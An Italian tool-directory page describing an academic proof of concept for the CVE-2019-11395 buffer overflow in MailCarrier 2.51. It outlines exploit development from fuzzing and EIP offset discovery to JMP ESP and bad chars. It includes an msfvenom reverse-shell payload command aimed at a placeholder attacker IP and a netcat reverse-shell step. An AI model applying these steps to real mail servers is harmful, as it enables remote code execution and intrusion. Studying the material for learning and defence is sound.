Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-11395 — Prova di concetto con finalità accademica per comprendere la vulnerabilità di Buffer Overflow, usando come base la CVE-2019-11395 | Kitploit
Strumenti/GitHubGitHub/rafaelbicas/cve-2019-11395
Generazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeFuzzingApprendimento e FormazioneBinary Exploitation
GitHubrafaelbicas/cve-2019-11395

CVE-2019-11395

Prova di concetto con finalità accademica per comprendere la vulnerabilità di Buffer Overflow, usando come base la CVE-2019-11395

Vedi Repository
111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-11395

Panoramica

Questo Proof of Concept (PoC) dimostra una vulnerabilità di Buffer Overflow in MailCarrier 2.51, che consente ad attaccanti remoti di eseguire codice arbitrario tramite una stringa lunga. La vulnerabilità può essere sfruttata utilizzando i seguenti processi:

  • SMTP RCPT TO
  • POP3 USER
  • POP3 LIST
  • POP3 TOP
  • POP3 RETR

Il progetto mira a fornire un approccio accademico per comprendere come funziona il Buffer Overflow.


⚠️ Avvertenze

Prima di eseguire qualsiasi test, non usare mai l'ambiente di produzione per la sperimentazione iniziale. Crea invece un ambiente di laboratorio simile a quello di produzione per evitare problemi o conseguenze indesiderate.


🔧 Preparazione

1. Scoprire la vulnerabilità

  • Usa la tecnica di fuzzing per determinare il numero approssimativo di byte necessari per far crashare l'applicazione.

2. Trovare l'Offset

  • Una volta verificatosi il crash, usa:
    msf-pattern_create -l <number_of_bytes>
    

Questo aiuta a determinare l'Offset, ovvero il numero esatto di byte necessari per sovrascrivere l'EIP.

  • Usa il seguente comando per confermare l'Offset
    msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
    

Questo identifica il numero esatto di byte necessari per ottenere il controllo dell'EIP.

3. Trovare un'istruzione JMP o CALL

  • Individua un'istruzione utilizzando:
    JMP ESP
    CALL ESP
    

Utilizzeremo questo indirizzo per reindirizzare l'esecuzione. Presta attenzione ad ASLR, SafeSEH o altri meccanismi di protezione.

4. Identificare i bad chars

  • Usa lo strumento Mona all'interno di Immunity Debugger per verificare la presenza di bad chars.

5. Generare lo shellcode

  • Crea lo shellcode escludendo i bad chars:
    msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python
    

6. Aggiungere NOP

  • Inserisci istruzioni NOP (\x90) nel payload per migliorare la stabilità.

7. Stabilire una connessione

  • Usa netcat (nc) per creare una reverse shell e connetterti al target.
Scarica lo strumento